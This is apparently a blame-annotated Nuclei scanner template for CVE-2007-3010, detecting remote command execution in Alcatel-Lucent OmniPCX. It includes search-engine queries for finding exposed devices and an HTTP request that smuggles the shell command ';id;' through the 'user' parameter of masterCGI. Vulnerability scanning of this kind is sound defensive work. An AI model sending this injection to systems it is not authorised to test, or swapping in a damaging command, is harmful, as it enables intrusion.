2023-10-13 16:05:59 +00:00
|
|
|
id: CVE-2007-3010
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Alcatel-Lucent OmniPCX - Remote Command Execution
|
|
|
|
author: king-alexander
|
2024-02-06 06:47:37 +00:00
|
|
|
severity: critical
|
2023-10-13 16:05:59 +00:00
|
|
|
description: |
|
|
|
|
The OmniPCX web interface has a script "masterCGI" with a remote command execution vulnerability via the "user" parameter.
|
|
|
|
impact: |
|
2024-02-06 06:47:37 +00:00
|
|
|
Any user with access to the web interface could execute arbitrary commands with the permissions of the webservers.
|
2023-10-13 16:05:59 +00:00
|
|
|
remediation: |
|
|
|
|
Update to supported versions that filter shell metacharacters in the "user" parameter.
|
|
|
|
reference:
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2007-3010
|
|
|
|
- https://marc.info/?l=full-disclosure&m=119002152126755&w=2
|
2024-02-06 06:47:37 +00:00
|
|
|
- http://www.redteam-pentesting.de/advisories/rt-sa-2007-001.php
|
|
|
|
- http://www.vupen.com/english/advisories/2007/3185
|
|
|
|
- http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
|
|
|
|
cvss-score: 10
|
|
|
|
cve-id: CVE-2007-3010
|
|
|
|
cwe-id: CWE-20
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-score: 0.97313
|
|
|
|
epss-percentile: 0.99874
|
2024-02-06 06:47:37 +00:00
|
|
|
cpe: cpe:2.3:a:alcatel-lucent:omnipcx:7.1:*:enterprise:*:*:*:*:*
|
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
max-request: 1
|
|
|
|
vendor: alcatel-lucent
|
|
|
|
product: omnipcx
|
2024-06-07 10:04:29 +00:00
|
|
|
shodan-query:
|
|
|
|
- title:"OmniPCX for Enterprise"
|
|
|
|
- http.title:"omnipcx for enterprise"
|
|
|
|
fofa-query:
|
|
|
|
- app="Alcatel_Lucent-OmniPCX-Enterprise"
|
|
|
|
- app="alcatel_lucent-omnipcx-enterprise"
|
|
|
|
- title="omnipcx for enterprise"
|
2024-05-31 19:23:20 +00:00
|
|
|
google-query: intitle:"omnipcx for enterprise"
|
2024-06-07 10:04:29 +00:00
|
|
|
tags: cve,cve2007,kev,rce,alcatel,alcatel-lucent
|
2023-10-13 16:05:59 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
2023-10-13 16:15:54 +00:00
|
|
|
path:
|
2024-02-06 06:47:37 +00:00
|
|
|
- "{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;id;"
|
2023-10-13 16:15:54 +00:00
|
|
|
|
2024-02-06 06:47:37 +00:00
|
|
|
matchers-condition: and
|
2023-10-13 16:05:59 +00:00
|
|
|
matchers:
|
2024-02-06 06:47:37 +00:00
|
|
|
- type: regex
|
|
|
|
part: body
|
|
|
|
regex:
|
|
|
|
- "uid=[0-9]+.*gid=[0-9]+.*"
|
|
|
|
|
2023-10-13 16:05:59 +00:00
|
|
|
- type: word
|
2024-02-06 06:47:37 +00:00
|
|
|
part: body
|
2023-10-13 16:05:59 +00:00
|
|
|
words:
|
2024-02-06 06:47:37 +00:00
|
|
|
- "<TITLE>master</TITLE>"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-06-08 16:02:17 +00:00
|
|
|
# digest: 4a0a00473045022100d5461b90f1703401d218da417966d156cdb851795019deb78cd43f70cb07ec6a022022e64196d18c50c25a32ba8e5bc6b0590867add3e6c725cae45d9cabf536f139:922c64590222798bb761d5b6d8e72950
|